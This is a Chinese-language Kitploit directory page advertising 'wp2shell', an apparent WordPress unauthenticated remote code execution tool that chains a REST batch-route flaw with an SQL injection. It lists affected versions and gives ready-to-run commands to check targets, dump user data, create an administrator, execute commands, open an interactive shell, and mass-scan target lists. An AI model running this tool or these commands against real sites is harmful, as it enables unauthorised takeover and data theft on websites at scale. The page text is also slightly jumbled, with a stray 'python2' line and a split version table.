Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wp2shell — wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
工具/GitHubGitHub/johenlastgen-jlg/wp2shell
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137)

查看仓库
211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

wp2shell - WordPress RCE PoC (CVE-2026-63030 + CVE-2026-60137)

WordPress 核心中的未认证远程代码执行

作者:JohenLastGen


📌 概述

该工具利用两个关键的 WordPress 漏洞链实现 未认证 RCE:

漏洞CVE描述
REST 批量路由混淆CVE-2026-63030绕过验证,传输 SQLi 载荷
WP_Query author__not_in SQL 注入CVE-2026-60137原始字符串注入 → SQL 执行

影响: 未认证攻击者 → 创建管理员 → 执行命令


🎯 受影响版本

版本范围状态
WordPress 6.9.0 - 6.9.4✅ 易受攻击 (完整 RCE 链)
WordPress 7.0.0 - 7.0.1✅ 易受攻击 (完整 RCE 链)

🚀 快速开始

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
下载工具
WordPress 6.8.0 - 6.8.5⚠️ 仅 SQL 注入 (需要辅助插件)
WordPress 6.9.5, 7.0.2+❌ 已修补